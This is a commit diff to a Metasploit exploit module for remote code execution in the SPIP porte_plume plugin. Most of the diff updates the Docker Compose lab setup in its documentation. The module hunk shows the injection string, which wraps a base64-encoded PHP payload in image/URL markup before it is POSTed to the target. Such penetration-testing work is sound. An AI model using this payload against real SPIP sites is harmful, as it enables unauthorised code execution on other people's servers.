Update documentation and Docker Compose for SPIP, remove Rex.sleep() in Metasploit module due to stable payload.

Chocapikk · Chocapikk · commit 62ab17b14d43 · 2024-08-20T19:41:05.000+02:00
diff --git a/documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md b/documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
@@ -28,31 +28,44 @@ services:
       - MYSQL_DATABASE=spip
       - MYSQL_USER=spip
       - MYSQL_PASSWORD=spip
-    networks:
-      - spip-network
+    volumes:
+      - mysql-data:/var/lib/mysql
 
   app:
     image: ipeos/spip:4.2.12
     restart: always
     depends_on:
       - db
     environment:
-      - SPIP_AUTO_INSTALL=1
+      - SPIP_SITE_ADDRESS=http://localhost:8880
       - SPIP_DB_SERVER=db
       - SPIP_DB_LOGIN=spip
       - SPIP_DB_PASS=spip
       - SPIP_DB_NAME=spip
-      - SPIP_SITE_ADDRESS=http://localhost:8880
+      - SPIP_AUTO_INSTALL=1
     ports:
       - 8880:80
-    networks:
-      - spip-network
+    volumes:
+      - spip-data:/var/www/html
 
-networks:
-  spip-network:
-    driver: bridge
+volumes:
+  spip-data:
+  mysql-data:
 ```
 
+This Docker Compose file configures a SPIP environment with a MariaDB backend, enabling automatic installation.
+Here are the correct setup details:
+
+- **SPIP Access URL:** `http://localhost:8880`
+- **Database Configuration:** Utilizes MariaDB, as specified by the database service setup.
+- **Automatic Installation:** Enabled via `SPIP_AUTO_INSTALL=1`.
+
+After launching the Docker container, SPIP will be accessible at `http://localhost:8880`.
+The automatic installation will simplify the initial setup, allowing you to start using SPIP without manual configuration.
+
+If you decide to disable automatic installation by setting `SPIP_AUTO_INSTALL` to `0`, you will need to manually configure SPIP.
+To do this, after starting the container, navigate to `http://localhost:8880/ecrire` to access the SPIP web installation panel.
+
 ### Non-Docker Setup
 
 If you prefer not to use Docker, you can manually set up SPIP with the following commands:
diff --git a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -113,8 +113,6 @@ def exploit
     b64_payload = framework.encoders.create('php/base64').encode(phped_payload)
     payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]"
 
-    Rex.sleep(0.5)
-
     print_status('Sending exploit payload to the target...')
     send_request_cgi({
       'method' => 'POST',
